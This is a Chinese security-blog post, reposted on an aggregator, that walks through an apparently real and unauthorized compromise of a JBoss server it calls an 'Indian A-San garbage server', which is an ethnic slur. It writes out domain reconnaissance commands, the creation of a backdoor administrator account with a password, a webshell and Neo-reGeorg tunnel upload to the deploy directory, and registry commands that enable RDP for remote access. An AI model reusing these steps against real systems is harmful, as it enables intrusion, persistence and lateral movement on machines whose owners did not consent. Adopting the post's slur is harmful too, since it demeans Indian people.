实战过印度阿三垃圾服务器

admin 2023年3月3日17:30:48评论26 views字数 1448阅读4分49秒阅读模式

免责声明

由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把藏剑安全设为星标”,否则可能就看不到了啦!

实战过印度阿三垃圾服务器
实战过印度阿三垃圾服务器

实战渗透

实战过印度阿三垃圾服务器
实战过印度阿三垃圾服务器

01

攻击目标

实战过印度阿三垃圾服务器

一眼Jboos

02

盘他

步骤一:使用漏洞探测工具发现存在反序列化漏洞...且命令收集以下信息

实战过印度阿三垃圾服务器

net user       //存在域用户,为域环境tasklist /svc  //不存在杀毒软件,但可能存在流量查杀软件ipconfig /all  //存在域:otr-ict.chn 且为内网环境netstat -an | findstr 3389 //未开启RDP服务setspn -q */*  //查看SPN信息,只有域控nltest /domain_trusts  //单域net user sis2212 123admiN@ /add      //successnet localgroup administrators sis2212 /add    //success


步骤二:这里直接使用PowerShell上线,发现该主机使用CDN服务.....

实战过印度阿三垃圾服务器


步骤三:尝试GetShell...这里是真的难啊

#查询weblogic端口下的程序shell netstat -anb   //8181--》QCJavaService.exe    #查询程序对应的存放目录shell wmic process where name="QCJavaService.exe" get processid,executablepath,name//--》 C:ProgramDataHPALMJBossbinQCJavaService.exe    #查询上传webshell的目录C:ProgramDataHPALMjbossserverdefaultdeployROOT.war //这里直接上传peak马和regeorg文件
#备注:这里翻遍了磁盘目录,很是无语

实战过印度阿三垃圾服务器


步骤四:访问shell.jsp并使用蚁剑链接....访问t0l.jsp(Neo-reGeorg服务端)成功...

实战过印度阿三垃圾服务器


步骤五:使用以下命令开启RDP服务并搭建通信隧道...

#开启RDP服务reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /freg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp" /v PortNumber /t REG_DWORD /d 3389 /freg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
#查看端口号REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber


步骤六:连通通信隧道并使用SockCap64进入,远程桌面链接....

实战过印度阿三垃圾服务器


03

总结


胆大、心细、拿下《一个终身免费的安全武器库

实战过印度阿三垃圾服务器

原文始发于微信公众号(藏剑安全):实战过印度阿三垃圾服务器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月3日17:30:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战过印度阿三垃圾服务器http://cn-sec.com/archives/1585278.html

发表评论

匿名网友 填写信息